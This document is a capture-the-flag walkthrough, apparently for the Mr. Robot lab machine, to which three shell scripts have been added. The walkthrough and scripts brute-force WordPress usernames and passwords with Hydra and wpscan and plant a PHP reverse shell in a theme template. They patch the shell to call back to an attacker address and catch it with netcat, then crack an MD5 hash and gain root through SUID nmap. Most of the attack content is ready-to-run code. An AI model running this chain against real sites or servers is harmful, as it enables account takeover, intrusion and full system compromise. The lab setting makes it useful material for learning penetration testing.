Start by checking for a robots.txt file. Notice that it lists the path to one of the flags and a dictionary file.
Let's use “wget” to grab both of the files listed in robots.txt.
Output the contents of “key-1-of-3.txt” to get the first FLAG.
Use “less” to view the contents of fsocity.dic and notice that this is a wordlist that can be used in further dictionary attacks.
Next, try to discover a valid username. The WordPress login form returns an “Invalid username” error when the username does not exist, while a wrong password for an existing user produces a different message, so the response tells the two cases apart. Use that string as Hydra's failure condition and feed it the “fsocity.dic” wordlist for the username parameter.
Hydra finds that “Elliot” is a valid username.
Let's use wpscan to run a dictionary attack for the user “elliot”. Based on trial and error (time), I decided to reverse the order of the “fsocity.dic” dictionary.
The password was discovered in 3 seconds. After logging into the WordPress blog, note that there is another user account (a subscriber). Use “wpscan” to dictionary attack that account as well.
Cracking the second WordPress account turned up nothing of further value.
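The recon and credential steps above, as an added shell script that is not part of the original walkthrough. It assumes the target address is supplied in TARGET (placeholder 10.0.0.10), that the login form is the standard WordPress /wp-login.php (fields log, pwd, wp-submit), and wpscan v3 option names; the dictionary preparation also drops duplicate lines, a general wordlist-hygiene step the post does not mention.

```shell
#!/bin/sh
# Added example (not from the original post). Assumptions: target reachable as
# $TARGET (placeholder 10.0.0.10), standard WordPress login form at
# /wp-login.php, hydra and wpscan (v3 option names) on the attack machine.
set -u
TARGET="${TARGET:-10.0.0.10}"

# Step 1: robots.txt named two files; fetch both (first flag and the wordlist).
fetch_robots_files() {
    wget -q "http://$TARGET/robots.txt" "http://$TARGET/key-1-of-3.txt" "http://$TARGET/fsocity.dic"
    cat key-1-of-3.txt
}

# Step 2: prepare the dictionary. Wordlists often repeat entries, so drop
# duplicates (keeping the first occurrence), then reverse the order as the
# post did so that entries near the end of the file are tried first.
# Prints the number of candidates written.
prep_wordlist() {   # prep_wordlist <in> <out>
    awk '!seen[$0]++' "$1" |
        awk '{ line[NR] = $0 } END { for (i = NR; i > 0; i--) print line[i] }' > "$2"
    wc -l < "$2" | tr -d ' '
}

# Step 3: username enumeration. WordPress answers "Invalid username" for an
# unknown user, so that string is hydra's failure condition (F=): any response
# that lacks it marks a valid username, whatever the dummy password was.
HYDRA_FORM='/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
enum_usernames() {  # enum_usernames <wordlist>
    hydra -L "$1" -p notthepassword -t 16 "$TARGET" http-post-form "$HYDRA_FORM"
}

# Step 4: password attack on a known user with wpscan (-U user, -P wordlist).
crack_password() {  # crack_password <user> <wordlist>
    wpscan --url "http://$TARGET" -U "$1" -P "$2"
}

# Run the whole chain only when asked, e.g.: TARGET=10.0.0.10 sh recon.sh --run
if [ "${1:-}" = "--run" ]; then
    fetch_robots_files
    prep_wordlist fsocity.dic fsocity.uniq.rev.dic
    enum_usernames fsocity.uniq.rev.dic
    crack_password elliot fsocity.uniq.rev.dic
fi
```

The functions are kept separate so the wordlist preparation can be checked offline before any traffic is sent; deduplication matters because every repeated line costs a login request and, on a rate-limited target, time.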
The “Elliot” account is an administrator on this WordPress blog. Administrators can edit theme files, which lets us plant a PHP reverse shell or PHP backdoor on the site. We will use this reverse shell:
Start by populating the “Archives” page on the blog: the archive template only renders once there is a published post, so select and publish the “Hello World” post from the “Posts” tab on the sidebar. Once that is done, browse to the “Theme Editor” under the Appearance tab of the Dashboard sidebar, choose the “Archives” template file and paste the reverse shell at the top of the document.
Note that you will need to change two values at the start of the shell. Set the “ip” value to the address of your attack machine and the “port” value to the port the backdoor should connect back to. Start a netcat listener on that port on your attack machine before triggering the shell.
Browse to the “archives” page and select a month; rendering the archive template executes the backdoor, which connects back to your listener.
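Preparing and catching the shell from the steps above, as an added example that is not part of the original post. It assumes the downloaded reverse shell begins with assignments of the form `$ip = '...';` and `$port = ...;` (as the common PHP reverse-shell template does), and uses 10.0.0.5 and 4444 as placeholder attacker address and port; the file contents in the test are a constructed stand-in, not the real shell.

```shell
#!/bin/sh
# Added example (not from the original post). Assumes the reverse shell file
# contains lines of the form  $ip = '127.0.0.1';  and  $port = 1234;
# Placeholders: ATTACKER=10.0.0.5, PORT=4444.
set -u
ATTACKER="${ATTACKER:-10.0.0.5}"
PORT="${PORT:-4444}"

# Rewrite the two connect-back values instead of editing them by hand. Every
# other line is copied through unchanged; the two patched lines lose any
# trailing comment. Usage: patch_reverse_shell <in.php> <out.php>
patch_reverse_shell() {
    awk -v ip="$ATTACKER" -v port="$PORT" '
        /^[$]ip = /   { print "$ip = '\''" ip "'\'';"; next }
        /^[$]port = / { print "$port = " port ";"; next }
        { print }' "$1" > "$2"
}

# Sanity check before pasting into the theme editor: both values must appear
# exactly once, otherwise the shell would call back to the template defaults.
verify_reverse_shell() {   # verify_reverse_shell <file>  -> exit 0 if patched
    [ "$(grep -c "^[\$]ip = '$ATTACKER';" "$1")" -eq 1 ] &&
    [ "$(grep -c "^[\$]port = $PORT;" "$1")" -eq 1 ]
}

# Listener on the attack machine; start it before loading the archives page.
# -l listen, -v verbose, -n no DNS, -p port (OpenBSD netcat / ncat syntax).
start_listener() {
    nc -lvnp "$PORT"
}

if [ "${1:-}" = "--run" ]; then
    patch_reverse_shell php-reverse-shell.php shell.php
    verify_reverse_shell shell.php && start_listener
fi
```

The verify step exists because the most common failure at this point is a listener that never receives a connection: the template's default address was left in place, or the port in the file and the port given to netcat differ.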
Once the connection arrives, let's start by getting a proper “bash” prompt by spawning a pty; a bare reverse shell has no terminal.
Let's browse the file system for another flag.
With our limited privileges we will need to escalate to continue. Notice that the /home/robot directory contains a “password.raw-md5” file that our low-privileged user can read.
Crack it using hashcat (raw MD5 is hash mode 0).
The password is not contained in the fsocity.dic wordlist; use “rockyou.txt” for this.
The password should be found quickly.
Use this password to switch user (su) to robot from the PHP backdoor's daemon account. su only prompts for a password when it has a terminal, which is why the pty upgrade above matters.
Display the contents of the FLAG file found in the “robot” user's home directory.
Next we look for SUID binaries that could escalate privileges and get us into “/root”.
The search turns up nmap; its interactive mode can spawn a shell, and because the binary is SUID that shell runs as root.
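The post-exploitation chain above (upgrading the shell, cracking the MD5, switching user, hunting SUID binaries and abusing nmap), as an added script that is not part of the original walkthrough. Functions marked [target] are meant to be pasted into the reverse shell, the hashcat function runs on the attack machine; it assumes rockyou.txt lives at /usr/share/wordlists/rockyou.txt, that python is present on the target, and the hash file in the test is a constructed placeholder rather than the real one.

```shell
#!/bin/sh
# Added example (not from the original post). [target] functions are pasted
# into the reverse shell; crack_md5 runs on the attack machine.
# Assumed path: rockyou.txt at /usr/share/wordlists/rockyou.txt.
set -u
ROCKYOU="${ROCKYOU:-/usr/share/wordlists/rockyou.txt}"

# [target] A bare reverse shell has no tty, and su refuses to prompt without
# one ("must be run from a terminal"), so spawn a pty first.
upgrade_tty() {
    python -c 'import pty; pty.spawn("/bin/bash")' 2>/dev/null ||
    python3 -c 'import pty; pty.spawn("/bin/bash")'
}

# [attacker] Options for a raw MD5 (hashcat mode 0, straight attack). If the
# file is in user:hash form, --username tells hashcat to skip the prefix.
hashcat_opts() {   # hashcat_opts <hashfile>
    if grep -q ':' "$1"; then echo "-m 0 -a 0 --username"; else echo "-m 0 -a 0"; fi
}

# [attacker] Try the site's own wordlist first, then rockyou.txt, as the post
# did; --show prints whatever the potfile now holds for the hash.
crack_md5() {   # crack_md5 <hashfile> <site-wordlist>
    opts=$(hashcat_opts "$1")
    for wl in "$2" "$ROCKYOU"; do
        # exit status 1 from hashcat only means "exhausted, nothing cracked"
        hashcat $opts --quiet "$1" "$wl" || true
        if hashcat $opts --show "$1" | grep -q .; then break; fi
    done
    hashcat $opts --show "$1"
}

# [target] Run after upgrade_tty; type the cracked password at the prompt
# rather than putting it on a command line, where ps would show it.
switch_to_robot() {
    su - robot -c 'id; ls -l'
}

# [target] SUID binaries execute with their owner's privileges (usually root),
# so list every regular file with the set-uid bit. Takes the root to search.
find_suid() {   # find_suid <dir>
    find "$1" -perm -4000 -type f 2>/dev/null
}

# [target] nmap 2.02 through 5.21 has --interactive, where a "!" prefix runs a
# shell command; with the SUID bit set that shell keeps root's effective uid.
# Newer nmap dropped the mode; an NSE script calling os.execute("/bin/sh")
# passed via --script is the equivalent.
nmap_root_shell() {
    echo 'At the nmap> prompt type:  !sh   then confirm with: id'
    nmap --interactive
}

if [ "${1:-}" = "--run" ]; then
    find_suid /
    nmap_root_shell
fi
```

If the shell spawned by `!sh` reports a non-root uid, the shell binary dropped its effective uid on start; a shell that honours `-p` (bash does) keeps it.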
By Jesse Shelley